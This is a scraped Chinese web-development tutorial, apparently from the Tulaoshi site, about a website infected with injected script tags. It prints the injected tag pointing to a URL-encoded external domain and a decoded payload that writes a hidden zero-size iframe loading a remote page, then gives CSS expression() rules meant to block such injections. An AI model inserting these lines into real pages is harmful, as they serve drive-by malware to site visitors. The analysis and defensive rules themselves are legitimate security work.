script src=http://%76%63%63%64%2E%63%6E/script
script src=http://%76%63%63%64%2E%63%6E/script
script src=http://%76%63%63%64%2E%63%6E/script
script src=http://%76%63%63%64%2E%63%6E/script
script src=http://%76%63%63%64%2E%63%6E/script
script src=http://%76%63%63%64%2E%63%6E/script
script src=http://%76%63%63%64%2E%63%6E/script
汗死,一连插入了N个一样的script标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:
document.write("div style='display:none'")
document.write("iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0/iframe")
document.write("/div")
又用迅雷下载http://a.158dm.com/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!
...
var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL\XXXXXLD"; Kfqq = Qqs;
(...略)(下面还有N个统计的JS代码)
针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,script木马的特点是什么:
script src=http://%76%63%63%64%2E%63%6E/script
对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他object代码,不管这么多,来多少杀多少。
(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/webkaifa/)来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:
解决方案1:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
原理:将script标记的src拿出来转为小写,再看是不是以http开头的外域JS脚本文件,如果是,则页面内容清空并写出木马被成功隔离!。反之正常显示。
缺点:访客无法看到被感染了script木马的页面。
(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/webkaifa/)解决方案2:
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。
猜你喜欢